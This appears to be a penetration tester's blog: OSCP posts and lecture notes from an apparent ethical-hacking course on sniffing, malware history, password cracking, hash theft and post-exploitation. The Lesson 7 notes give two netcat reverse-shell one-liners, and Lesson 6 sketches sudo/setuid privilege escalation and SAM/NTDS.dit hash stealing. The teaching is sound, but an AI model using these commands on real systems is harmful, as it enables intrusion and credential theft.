Running KeepNote on a Mac

During my PWK training, I absolutely fell in love with KeepNote.  I used it extensively for tracking all the different networks, all the hosts in that network, all the different scan results and loot I’d collect on each, and also general notes about attack vectors I had tried, what worked, what didn’t work, what to explore, little code snippets or Linux commands for easy copy-and-paste use later, links to helpful articles…you get the picture.

Unfortunately, KeepNote isn’t very well-maintained.  As of this Fourth of July, the latest versions uploaded to the main site are five years old.  The original developer did put it on Github two years ago, but there haven’t been many pull requests accepted since then and he obviously doesn’t have the time to keep up with it anymore.  Totally understandable, but it sucks because I haven’t found a good, well-maintained replacement for it.

And believe me, I’ve tried!  Evernote, Bear, nvALT, desktop wikis like Zim, the macOS Notes app, and on and on.  No one else is doing, or even offering an option to do, the same kind of UI layout.  I don’t know why, but the three-pane arrangement of KeepNote just hits the spot for me.  The outline on the left side, submenu on top right, and notes section on bottom left; no one else arranges their app like this.


For real, this is my happy place.

Continue reading

OSCP Update

Look what came in the mail a few weeks ago!

For the curious, it took about a month for them to send the paper certificate and a little hard-plastic credit card sized version via DHL courier.  They send you an email asking where you want it mailed, just in case you’ve switched apartments or something in between registering and passing the exam.

Also, I realized in my previous OSCP review that I forgot to mention a few things.  I’ll list them here and also add them as an update to the original review post. Continue reading

My OSCP Experience

**Update (11/4/2016) – added a few bits back in from this post

A few weeks ago, I “tried harder” and was awarded the Offensive Security Certified Professional (OSCP) certification.

As many people before me have done, I decided I’d post a little writeup of my experience with the Pentesting With Kali (PWK) online training and taking the OSCP exam (twice).

As you probably know by now, the OSCP is Offensive Security’s certification for penetration testing using the Linux distribution they maintain, Kali Linux.   The accompanying course, Pentesting With Kali (PWK), gets you a PDF lab guide and a series of instruction videos covering the different topics of the guide, from basic network enumeration to writing buffer overflow exploits.  You’re also purchasing VPN access to their hands-on lab environment of dozens of different vulnerable hosts for you to probe and exploit.  To attain the OSCP certification, you take a hands-on exam in which you’re given VPN access to a special exam network and are alotted 24 hours to compromise as many systems as possible, plus an additional 24 hours to write up and submit your exam penetration test report.

I signed up for the 90-day course, bought a one-month extension after I ran out of time (mostly for going back over machines to write the huge lab report…more on that later), I bombed my first attempt at the exam, purchased a two-week extension in order to bone up on some stuff and get a retest attempt, then passed it on my second try.

The Cost, Signing Up, and Getting your Employer to Pay For It

I’ve wanted to take OffSec’s training for a long time and I should’ve just sucked it up, ponied up the money, and took it years ago.  I fought for over a year at my previous employer to get them to finance it.  I was ready to give up arguing with them and buy it myself before I landed in my current job.  Thankfully, where I work now has a healthy training budget for its pentesters and all I had to do was put it on the corporate card. Continue reading

CNS 320 Lesson 9 – Sniffing

Lesson 9 – Sniffing

Screen Shot 2016-02-06 at 9.59.41 AM.png

Screen Shot 2016-02-06 at 9.59.45 AM.png

  • In the old days, most LANs used hubs.  When a packet would come into the LAN, the hub would send it to everyone.  If the packet said its destination was your network card’s MAC address, you would take it and process it.  If it *didn’t* have your MAC, you were supposed to politely ignore it.  Yeah…you can guess how this ends.
  • Nowadays, LANs use “switches” instead of hubs.  Switches are smarter and keep track of which MAC address is hooked into which port on the switch.  That way, it only sends the packet to the computer it’s intended for.  This makes sniffing other people’s traffic more difficult…but we’ll see how attackers can get around this.
  • NOTE: later, we’ll talk more in depth about wireless networks.  Since they use radio signals that propagate out in all directions, they inherently have many of the same problems as hubs do.

Screen Shot 2016-02-06 at 9.59.46 AM.png

  • Rlogin or rsh is an old remote access protocol for logging into Linux/Unix servers.  It and telnet are both plain-text and have mostly been replaced by SSH, which is encrypted.  Rlogin/rsh usually operates on TCP port 513.
  • NNTP = Network News Transfer Protocol, the protocol used for sharing Usenet posts.  TCP 119 is reserved for it.

Screen Shot 2016-02-06 at 12.36.20 PM.png

  • Network taps sit inline between switches, routers, and/or hosts and listen in on the packets being sent.  Troubleshooting tools and intrusion detection systems (IDS) are two types of tools that often employ taps in order to monitor the network.
  • Port mirroring (SPAN as it’s called in Cisco products) is a feature of the router or switch itself and can more intelligently filter what data to intercept

Screen Shot 2016-02-06 at 9.59.49 AM.png

Screen Shot 2016-02-06 at 9.59.50 AM.png

Screen Shot 2016-02-06 at 9.59.51 AM.png

Screen Shot 2016-02-06 at 9.59.52 AM.png

Screen Shot 2016-02-06 at 9.59.53 AM.png

Screen Shot 2016-02-06 at 10.00.06 AM.png

Screen Shot 2016-02-06 at 10.00.07 AM.png

Screen Shot 2016-02-06 at 10.00.08 AM.png

Screen Shot 2016-02-06 at 10.00.10 AM.png

  • Intranet Spoofing: Acting as a device on the same internal network
  • Internet Spoofing: Acting as a device on the Internet
  • Proxy Server DNS Poisoning: Modifying the DNS entries on a proxy server so the user is redirected to a different host system
  • DNS Cache Poisoning: Modifying the DNS entries on any system so the user is redirected to a different host

Screen Shot 2016-02-06 at 10.00.11 AM.png

Screen Shot 2016-02-06 at 10.00.12 AM.png

Screen Shot 2016-02-06 at 10.00.16 AM.png

  • Ping method: if you suspect a certain IP address is a sniffer, send it a ping packet with its valid IP addresses but the wrong MAC address.  If it responds anyway, it’s the sniffer.
  • ARP method: send out a non-broadcast ARP message. Next, we send a broadcast ping packet with our IP address but a different MAC address. Only a machine that has our correct MAC address from the sniffed ARP frame will be able to respond to our broadcast ping request.
  • Source-route method: send out a ping, but with a loose-source route so that it will be routed through another machine on your network segment. Most computers won’t route packets like this, but if you get a response, it’s like the machine is running in promiscuous mode.
  • Decoy method: this method involves sending false information over the wire (such as fake username/password combos) and seeing if anyone acts on it.
  • Reverse DNS method: many sniffer programs will automatically perform reverse DNS lookups of the addresses we sniff. If you start seeing two machines have remarkably similar DNS traffic, one could be sniffing the other.
  • Latency method: flood the network with traffic.  The sniffer will start to creak under the strain.  If you see a machine on the network suddenly having very high latency when responding to requests, it might be the one sniffing.
  • TDR: TDRs are tools for testing electrical cables.  They are capable of detecting hardware taps and sniffers.

Screen Shot 2016-02-06 at 10.00.17 AM.png

  • Port security, or MAC filtering, will lock a specific MAC address to a specific port on a switch.  This way, it prevents ARP spoofing.
  • You could also go to the trouble of making a static ARP table and ignoring any spoofers sending out unsolicited APR replies.
  • The most common method is to use network IDS/IPS products that look for suspicious traffic, like floods of unsolicited ARP replies or large volumes of DNS traffic.
  • The best way to deal with sniffers is to make them pointless.  If you use public-key encryption (like TLS), it won’t matter if you’re being sniffed; the eavesdropper won’t be able to read your packets anyway.

Screen Shot 2016-02-06 at 10.00.18 AM.png

  • In the labs for this lesson, I would have my students work through a tcpdump tutorial ( Most of them were already very familiar with Wireshark, but few had used tcpdump on the command line.
  • After that, we’d pair up and play with sniffing traffic.  I would start them out with the relatively-simple arpspoof utility and then start using the more advanced ettercap.


CNS320 Lesson 8 – Malware

Lesson 8 – Malware

Screen Shot 2016-01-24 at 2.01.47 PM.png

  • dr-mario-virus-dancing-gif-davesgeekyideas.gif

Screen Shot 2016-01-24 at 1.56.39 PM.png

Screen Shot 2016-01-24 at 1.56.40 PM.png

  • Blackmail and extortion runs the gamut from encrypting your files and holding them ransom or stealing nude pics and making you pay the attacker not to blast them all over the internet

Screen Shot 2016-01-24 at 1.56.41 PM.png

Screen Shot 2016-01-24 at 1.56.42 PM.png

  • Don’t rely on slowdown and excessive CPU/RAM usage as your prime indicator…that’s usually just a sign that your computer is old piece of shit

Screen Shot 2016-01-24 at 1.56.43 PM.png

Screen Shot 2016-01-24 at 1.56.45 PM.png

  • The malware author first designs the malware
  • Then the malware replicates across networks and machines to victim computers
  • The malware then launches and performs whatever action is intended (holding files ransom, stealing sensitive info, installing keystroke loggers, enrolling the machine in a botnet, just trashing it, etc.)
  • Eventually, researchers and antivirus companies detect the virus in the wild, categorize it, and start building signatures for it
  • When that signature info is incorporated into AV products, antivirus can know recognize it…
  • …and start to eliminate the malware

Screen Shot 2016-01-24 at 1.56.46 PM.png

  • Boot sector viruses target the boot sector or Master Boot Record of hard drives, bootable floppies, CDs, USBs, etc.
  • File viruses infect files (duh).  Adobe PDF is a popular vector.
  • Program viruses infect executables.
  • Network viruses (according to the book) are viruses that spread over the network, usually via email.  It’s not really clear how this is different from a worm.
  • Source code viruses actually look for C, Java, or other source code on a machine and alter it to include malicious code.  These viruses are extremely rare.
  • Macro viruses, the bane of the 90’s, are written in the “macro language” of another application…such as an embedded macro in a Word or Excel document.  The Melissa virus was one of the earliest and most widespread of macro viruses.  Macro viruses have mostly tailed off in popularity.
  • Multipartite viruses utlize more than one of the above methods to infect and spread

Screen Shot 2016-01-24 at 1.56.47 PM.png

Screen Shot 2016-01-24 at 1.56.48 PM.png

  • TSR viruses usually load themselves into memory and then delete any files or binaries they used to get there in the first place.
  • Cavity viruses hide in the unused whitespace inside certain applications and file formats.
  • A tunneling virus is a virus that attempts to intercept anti-virus software before it can detect malicious code. A tunneling virus launches itself under anti-virus programs and then works by going to the operating system’s interruption handlers and intercepting them, thus avoiding detection. Interception programs, which remain in the background of an operating system and catch viruses, become disabled during the course of a tunneling virus.
  • Stealth viruses also use various means to evade antivirus, by means of hooking system calls and interrupts, changing them so that it doesn’t alert AV software.  Difference between it and a tunneling virus is that stealth viruses intercept everything, but tunneling viruses intercept only AV system calls.
  • Camouflage viruses crudely try to masquerade as a legitimate program.  They’re trivial for AV to find and kill.
  • Encrypted viruses come with a decryption module and then try to encrypt the bulk of the viral code and any infected binaries in order to evade signature-based AV.
  • Polymorphic and metamorphic viruses are similar in that both modify the underlying virus code with each iteration.  The difference is that metamorphic code will randomly re-write every part of itself, whereas polymorphic viruses usually have a mutation engine (or decryption module) that stays untouched and unmodified, making polymorphics easier to catch by AV.

Screen Shot 2016-01-24 at 1.56.49 PM.png

Screen Shot 2016-01-24 at 1.56.52 PM.png

Screen Shot 2016-01-24 at 1.56.53 PM.png

Screen Shot 2016-01-24 at 1.56.54 PM.png

Screen Shot 2016-01-24 at 1.56.55 PM.png

  • Creeper was an experimental, benign self-replicating program unleashed on DEC PDP-10 computers running the TENEX operating system.  Reaper was a program written to get rid of Creeper instances, making it the first anti-virus.
  • Rabbit was the first example of a “fork bomb,” a virus that keeps forking new processes of itself until it uses up all the system resources and DoS’s the box
  • Fred Cohen was an engineering student at the University of Southern California who first coined the term “computer virus” with a proof-of-concept program and an accompanying research paper in 1983.
  • Elk Cloner was invented as a prank by teenage computer enthusiast Rick Skrenta.  It was a boot sector virus that infected Apple II floppy disks.  It was harmless, only displaying a taunting message to users, but it could occasionally ruin disks if it accidentally overwrote the wrong part of a floppy’s boot sector.
  • Brain was the first boot sector virus to infect MS-DOS machines, written by Pakistani programmers and brothers Basit and Amjad Alvi.  It was originally written as an anti-piracy program, but unexpectedly spread to other disks.  Mikko Hyponnen of F-Secure tracked down the two brothers in 2011, who still own an IT business in Lahore.
  • The Morris Worm was unleashed on the ARPANet by then Cornell University student Robert Tappan Morris.  Morris said he did it as a way to gauge the size of the Internet, not to cause harm.  The worm spread using several possible methods; it would try to exploit known vulnerabilities in common Unix programs like sendmail, finger, and rlogin and would also try to remotely login by guessing weak passwords.  The worm itself was harmless; it would simple get into a new machine, then look for network neighbors and spread to them too.
  • Morris had written it so that, if it detected there was already a copy of the worm installed, it wouldn’t reinfect……except every seventh time, it would install another copy of itself, ostensibly as protection against false positives or people trying to fool his worm and keep it from spreading.  With enough time, as the worm reinfected the same hosts continuously, it turned into a massive widespread DoS attack.
  • Morris became the first person convicted under the then-new CFAA law.  He eventually served three years probation, did 400 hours of community service, and was fined over $10,000.
  • Morris went on to found several Silicon Valley start-ups and is currently a tenured professor at MIT.

Screen Shot 2016-01-24 at 1.56.56 PM.png

  • A floppy disk of the Morris worm’s source code in the Computer History Museum in Mountain View, CA

Screen Shot 2016-01-24 at 1.56.57 PM.png

  • Pretty sure Michaelangelo was the inspiration for the “Da Vinci virus” in the movie Hackers

Screen Shot 2016-01-24 at 1.56.59 PM.png

  • Code Red worm exploited flaws in Microsoft IIS web servers, Nimda was another devastating worm/file infector combo that used other means to propagate, but could exploit backdoors left behind by old Code Red infections
  • Beast was one of the first reverse shell RATs for Windows.
  • Slammer was a DoS worm that exploited a buffer overflow in Microsoft SQL Server and Desktop Engine to crash Windows machines.
  • Blaster spread via a buffer overflow in the RPC service on TCP port 135 and would try to use infected hosts to DDoS the Windows Update website with a SYN flood.
  • Sasser was another big DoS worm that exploited LSASS (the Local Security Authority Subsystem Service) in Windows 2000 and XP
  • Zeus is one of the longest-lived bank credential-stealing Trojans, keeping alive through changes and variants such as the newer GameOver ZeuS offshoot and merging code with the SpyEye trojan.
  • Conficker was a worm that exploited numerous Windows infections
  • Stuxnet and Duqu may very well be the first and some of the most successful cyberweapons. Leaks from inside the US government allege it was developed as part of a US/Israeli joint operation to target and destroy Iranian uranium enrichment centrifuges.
  • Blackhole is an example of an “exploit kit” or “crimeware kit,” that allows low-skilled cybercriminals to put together bank credential-stealing or botnet-enrolling trojans of their own.
  • Flashback made waves as one of the first widespread Mac OS X pieces of malware.  It used a vulnerability in Java and spread through malicious websites.
  • Flame is another cyberweapon, supposedly developed by the NSA and Israel.
  • CryptoLocker kicked off the era of encryption ransomware.  It and it’s copycats would infect a machine, encrypt all the user’s personal files, then hold them for ransom.  If the user paid the ransom (usually an amount set in an anonymous cryptocurrency like Bitcoin), the malware creator would give them the decryption key so they could access their files again.

Screen Shot 2016-01-24 at 1.57.00 PM.png

  • Glance over this list, because you may see a question or two about suspicious ports on your exam.

Screen Shot 2016-01-24 at 1.57.02 PM.png

Screen Shot 2016-01-24 at 1.57.03 PM.png

  • Air-gapping means the machine is not connected to other machines over network connections.


CNS320 Lesson 7 – Post-Exploitation

Lesson 7 – Post-Exploitation

Screen Shot 2016-01-23 at 10.54.53 PM.png

Screen Shot 2016-01-23 at 10.54.54 PM.png

Screen Shot 2016-01-23 at 10.54.55 PM.png

Screen Shot 2016-01-23 at 11.15.42 PM.png

Screen Shot 2016-01-23 at 10.54.58 PM.png

Screen Shot 2016-01-23 at 10.54.59 PM.png

Screen Shot 2016-01-23 at 10.55.00 PM.png

Screen Shot 2016-01-23 at 10.55.01 PM.png

Screen Shot 2016-01-23 at 10.55.03 PM.png

  • Netcat is a tool you will need to get very comfortable with as a pentester.  Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports.  It’s built into almost every Linux or Unix OS (including OS X) and versions are availble for Windows and other OS’s too.
  • Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others

Screen Shot 2016-01-23 at 10.55.04 PM.png

Screen Shot 2016-01-23 at 10.55.05 PM.png

Screen Shot 2016-01-23 at 10.55.07 PM.png

Screen Shot 2016-01-23 at 10.55.08 PM.png

Screen Shot 2016-01-23 at 10.55.12 PM.png

  • Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers.  Or even pentesters on engagements, for that matter.

Screen Shot 2016-01-23 at 10.55.14 PM.png

Screen Shot 2016-01-23 at 10.55.15 PM.png

Screen Shot 2016-01-23 at 10.55.17 PM.png

Screen Shot 2016-01-23 at 10.55.18 PM.png

  • Stego-only attack: you only have the medium with the hidden data in it
  • Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
  • Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
  • Known-stego attack: you know the steg method used and you have access to the original and modified medium
  • Chosen-stego attack: you have access to different steg tools and you try each them and look for similarities to determine which method was used for the file you’re analysing
  • Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures

Screen Shot 2016-01-23 at 10.55.20 PM.png

Screen Shot 2016-01-23 at 10.55.22 PM.png

Screen Shot 2016-01-23 at 10.55.23 PM.png

Screen Shot 2016-01-23 at 10.55.25 PM.png

Screen Shot 2016-01-23 at 10.55.26 PM.png

  • The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.

Screen Shot 2016-01-23 at 10.55.27 PM.png

  • Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali.  Check out README.Debian and README.gz.  Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
  • Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd.  The netcat-openbsd is the most common version you’ll find that comes installed on Debian, Ubuntu, Redhat, and various other Linux distributions.  The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to prevent hackers leaving backdoors.
  • Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
    1.)     mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
    2.)     mkfifo pipe && nc <remote serve> <port> < pipe | /bin/bash &> pipe         <——– this one is better, because it will also pipe stderr to you (so you can see error messages)


This is the point in the class where I would start doing actual CTF challenges with the students.  What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack.  I had pretty small classes, so I this was doable.  I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.

But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself.  Here are the first few I started them out on:

You can easily download the ISO images and run them in VMware or VirtualBox.  I urge to try to solve them on your own.  The De-ICE ones do have a hint page in the target machine’s website.  If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.

Good luck!

CNS320 Lesson 6 – Exploitation

Lesson 6 – Exploitation

Screen Shot 2016-01-23 at 1.37.29 PM.png

Screen Shot 2016-01-23 at 1.37.31 PM.png

Screen Shot 2016-01-23 at 1.37.32 PM.png

Screen Shot 2016-01-23 at 1.37.33 PM.png

Screen Shot 2016-01-23 at 1.37.34 PM.png

  • If you have the ability to listen to traffic on the network (on an open WiFi access point or an old network using hubs, for instance), you could easily find poorly-protected passwords going over the wires.  Services like telnet, FTP, and badly-written websites can transmit password in plain-text over unencrypted channels.
  • The other option is, if the network doesn’t allow you sniff all traffic, then make the traffic come through you!  A man-in-the-middle (MiTM) attack means you get in between your victim and the target you want to access, so you can sniff password or other sensitive info.  More on this subject to come.
  • A compliment to a MiTM attack, or perhaps other attacks we’ll talk about later like cross-site scripting (XSS) or pass-the-hash, is to try a replay attack.  If a system has poor session management or authentication processes, you might be able to capture a hash, access token, session cookie, or similar and just send it to the server, letting you in without ever having to guess or crack your victim’s password.
  • An active online attack would be password guessing, where you connect to the system, web app, etc. and try different passwords.

Screen Shot 2016-01-23 at 1.37.37 PM.png

  • Offline attacks mean that you’ve captured  password hashes, either by stealing the authentication database from a web app, or the Windows SAM file, the Linux shadow file, or similar.  The passwords are in stored in a cryptographic hash format, meaning they’ve been run through a one-way algorithm to generate a fix-length hash (which usually looks like hexadecimal gobbledegook).  The way to crack hashes is to run different words or strings of characters through the same hashing algorithm (such as NTLM for Windows, MD5 for most web apps, etc.), and if you get a match against the stolen hash, then you know that word or string of characters is the password.
  • A dictionary attack is just like what it says: take a dictionary of words, common passwords, or what-have-you and throw it against the system.  The most common and the most effective type of attack.  Kali Linux has several dictionaries in the /usr/share/wordlists directory.  One of the most widely-used is the RockYou list, which is a dump of millions of real-world passwords that were used by users of a popular gaming site that was compromised in 2009.  You’ll also find other wordlists and dictionaries in other app’s directories in the /usr/share tree.
  • Brute-forcing is trying every possible character combination until you find the password.  In essence, you start at “a”, then try “b”, eventually you work up to “aa”, and so on.  In the end, brute forcing will always win…it’s simple a matter of whether it’ll take minutes or centuries to finally guess your password.
  • Hybrid attacks are anything in between.
  • Rainbow tables (AKA precomputed hashes) are just huge lists of millions or billions of different password hashes for you to throw against a certain system (like a list of every possible NTLM hash to try against Windows or every MD5 hash to try against a web app’s stolen password database).  The idea is that you spend the time up-front generating all the possible hashes so that you can then quickly use it against multiple targets.
  • Syllable attacks are a combination of dictionary and brute-forcing, where you might try different permutations of dictionary words (like “password” > “password1” > “p@ssw0rd” etc.)
  • Rule-based attacks are were you have some sort of intelligence about the password policy.  For example, you know that passwords on the system have to be between 8 and 12 characters long, have to have one upper-case and one lower-case letter, and only allow “!” or “@” for special characters.  You could then tailor the attack to only try out guesses that match those rules, e.g., you wouldn’t waste time trying a password like “passwd” or “pa$$word”
  • A distributed attack could be any of the above, except that instead of just one computer trying to crack the password, multiple machines in parallel might each be trying to crack it, each other them divvying up the workload.  This is usually facilitated with a botnet.

Screen Shot 2016-01-23 at 1.37.38 PM.png

  • Shoulder surfing is when an attacker tries to get close to a victim as they are inputing their password and watch the keys pressed.
  • Keyboard sniffers are hardware- or software-based tools that capture the keystrokes a user puts in, which an attacker can then read and learn the victim’s password
  • To paraphrase Kevin Mitnick, why spend hours cracking hashes when users will just give you their passwords?  We’ll cover social engineering more later.

Screen Shot 2016-01-23 at 1.37.40 PM.png

  • John the Ripper is one of the oldest and most widely-used password cracking tools.  It can quickly perform dictionary or brute-force attacks on password hashes.
  • Hashcat is a newer program that offers various types of dictionary, brute-force, and hybrid attack options.  It can also utilize the GPU graphics cards in computers for extremely-fast cracking.
  • Cain and Abel is a Windows-only all-in-one hacking tool.  Password hash cracking is one of its many features.
  • Ophcrack and L0phtcrack are both famous Linux-based tools for cracking Windows LM and NTLM hashes
  • RainbowCrack is, you guessed, used to generate rainbow tables and crack hashes against them
  • There are many other password cracking tools out there, many tailored to specific sorts of password hash formats.

Screen Shot 2016-01-23 at 1.37.41 PM.png

  • THC Hydra is the old gold-standard for brute forcing everything from SSH to FTP to online forms to Cisco appliances.  It takes a user or list of users, then a wordlist of potential passwords, and will go to work brute-forcing logins.
  • Medusa is a work-alike to Hydra that’s meant to be faster and more stable.
  • CeWL is a custom wordlist generator.  It can spider a target’s website(s) and use the information it gathers to build customized wordlists of potential passwords to try out.
  • Burp Suite, WebScarab, and ZAP are all HTTP/S intercept proxies that can be used to attack web logins.  We’ll talk more about them in our lessons on web vulnerabilities.

Screen Shot 2016-01-23 at 1.37.42 PM.png

Screen Shot 2016-01-23 at 1.37.44 PM.png

  • The SAM is well-known for having local usernames and hashes stored in it; if you also have the SYSTEM and SECURITY hives with it, you also get access to cached Active Directory hashes, password history, and other valuable intel
  • Active Directory Domain Controllers have a domain-wide password hash database called NTDS.dit.  If you get NTDS.dit, you have the hashes of every user in the domain.
  • SAM, SYSTEM, and SECURITY are stored in C:\WINDOWS\system32\config\ and the NTDS.dit file is stored in C:\WINDOWS\ntds\
  • You can’t normally get to the SAM, SYSTEM, and SECURITY files while a Windows machine is turned on, but you can steal them out of memory or from Volume Shadow Service (VSS) backup copies, if they exist.  If you have physical access, you can turn the machine off, boot it from a Linux LiveCD or LiveUSB, mount the Windows hard drive, and steal the files.

Screen Shot 2016-01-23 at 1.37.45 PM.png

Screen Shot 2016-01-23 at 1.37.46 PM.png

Screen Shot 2016-01-23 at 1.37.48 PM.png

Screen Shot 2016-01-23 at 1.37.49 PM.png

  • There are lots of tools that will try to dump the SAM file, either out of memory or out of Volume Shadow Service (VSS) backup copies, including pwdump, fgdump, and others.  There’s a cat-and-mouse game between these tools and antivirus detection engines, so they’re constantly being updated, changed, or new ones written.
  • chntpw is a Linux utility you can used when you mount a hard drive with Windows on it to steal hashes or overwrite them with your own
  • NTDSXtract is for stealing hashes from NTDS.dit files
  • Kon-Boot used to be a free tool that is now for-pay, unfortunately.  You would boot it from a CD or USB stick, it would run first, then it would boot Windows and act as a man-in-the-middle rootkit, allowing you to completely bypass the password screen and gain instant access to a Windows workstation.
  • Volume Shadow Service (VSS) is a Windows service that takes backup snapshots of the running Windows OS.  If you have admin-level privileges, you can often find backup copies of the SAM and other important files in here.  There are numerous tools available to automate this.
  • As mentioned, you can just boot Linux from a CD or USB on the victim machine, mount the Windows drive, and steal the file that way

Screen Shot 2016-01-23 at 1.37.50 PM.png

  • WMIC = Windows Management Instrumentation Command-Line
  • Example: “wmic qfe get Caption,Description,HotFixID,InstalledOn” would list out all the hotfix and security patches applied to that Windows install

Screen Shot 2016-01-23 at 1.37.51 PM.png

Screen Shot 2016-01-23 at 1.37.53 PM.png

Screen Shot 2016-01-23 at 1.37.54 PM.png

Screen Shot 2016-01-23 at 1.37.56 PM.png

Screen Shot 2016-01-23 at 1.37.57 PM.png

  • As you’ll see, there’s a lot of things that can go wrong with Linux, especially in regards to privilege escalation via setuid or sudo

Screen Shot 2016-01-23 at 1.37.58 PM.png

Screen Shot 2016-01-23 at 1.38.00 PM.png

Screen Shot 2016-01-23 at 1.38.01 PM.png

Screen Shot 2016-01-23 at 1.38.02 PM.png

  • When Linux systems crash, they often “dump core” and dump the contents of RAM into a file, for the purpose of diagnosing what caused the crash.
  • Users of SSH will have a hidden directory called .ssh automatically created in their home folder.  This could contain keyfiles that they use to login to other servers.

Screen Shot 2016-01-23 at 1.38.04 PM.png

  • Cron is the task scheduling system used by most Linux/Unix systems.  Unfortunately, cron jobs can be all over the place, depending on who or what is scheduling them; hence all the different places you have to look.

Screen Shot 2016-01-23 at 1.38.05 PM.png

  • Hence why dd is sometimes said to stand for “disk destroyer” 🙂

Screen Shot 2016-01-23 at 1.38.06 PM.png

Screen Shot 2016-01-23 at 1.38.08 PM.png

Screen Shot 2016-01-23 at 1.38.09 PM.png

Screen Shot 2016-01-23 at 1.38.10 PM.png

Screen Shot 2016-01-23 at 1.38.11 PM.png

  • Example: you hacked an account with sudo rights, but all it can do is use sudo to execute a script called “”.  Just delete the script (rm, then link the old name to a shell (ln /bin/bash, then run it with sudo permission (sudo ./ and bam, you have root!
  • Another one is if you’re granted sudo rights to some sort of program that can edit files, like nano, vim, or even a hex editor.  You can then run it and change the sudoers file to expand that compromised account’s rights or grant rights to another account of your choosing.

Screen Shot 2016-01-23 at 1.38.13 PM.png

  • Normally, in Linux and Unix, when you run a program, it runs with your own level of permisisons.  But some programs need to run at a higher level of privilege in order to use special OS services, like the “mount” utility that has to interact with the kernel to mount new filesystems.  Instead of giving everyone root permissions, you can just give the program the “setuid” access right so that when normal users run it, it’s as if root was running.
  • An example of exploiting this would be if a text editor owned by root had the setuid attribute set.  If you ran it, you could then go edit the sudoers file, open up and read the shadow file, or otherwise get access to sensitive files beyond your access level.

Screen Shot 2016-01-23 at 1.38.14 PM.png

  • If you always type “ls –al” when listing directory contents, you might make an alias of “ll” or “lal” or even just “ls” for that command and save it to your shell’s config file (usually .profile or .bashrc or similar).  You could also use alias to trick users into executing rootkitted version of apps like top or free to hide your activity.
  • Chroot is in every Unix-like distro.  Jail is much stricter and is mostly seen in BSD distributions.